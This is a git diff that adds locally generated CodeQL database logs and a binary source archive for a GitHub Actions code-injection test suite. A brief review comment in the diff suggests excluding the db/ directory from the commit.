of 27) +[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations +[2024-03-01 13:05:59] Merging 1 fragment for 'files'. +[2024-03-01 13:05:59] Merged 208 bytes for 'files'. +[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. +[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. +[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. +[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. +[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. +[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. +[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'. +[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Saving string and id pools to disk. +[2024-03-01 13:05:59] Finished importing TRAP files. +[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. +[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) +[2024-03-01 13:05:59] String pool size: 2.06 MiB +[2024-03-01 13:05:59] ID pool size: 1.08 MiB +[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). +[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. 
+[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). +[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 +[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 +[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:06:00] Unpausing evaluation +[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. 
+[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). +[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed. +[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. +[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). +[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. +[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log new file mode 100644 index 000000000000..e204c6df37d0 --- /dev/null +++ b/db/log/database-index-files-20240301.130558.974.log 
@@ -0,0 +1,44 @@ +[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Log file was started late. +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... 
+[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", + 
"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" + ] +[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. 
+[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Terminating normally. 
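Review bot: This log, the database-create log before it and `db/src.zip` are a locally generated CodeQL database rather than source, and nearly every line embeds the developer's home directory and username (`/Users/pwntester/...`) plus the absolute checkout path, so committing them writes that environment detail into whatever history the repository is shared from. The tree will also go stale the next time the database is regenerated, so reviewers get noisy binary and log churn with no reviewable content. I would drop the `db/` directory from this commit and add a `db/` entry to the repository's `.gitignore` so the test database is rebuilt locally instead of checked in; the extraction itself ran cleanly, so nothing in the log content needs changing.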
diff --git a/db/src.zip b/db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3006b787babfbfd5da405e1a7f5736ea762e4abe GIT binary patch literal 20479 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 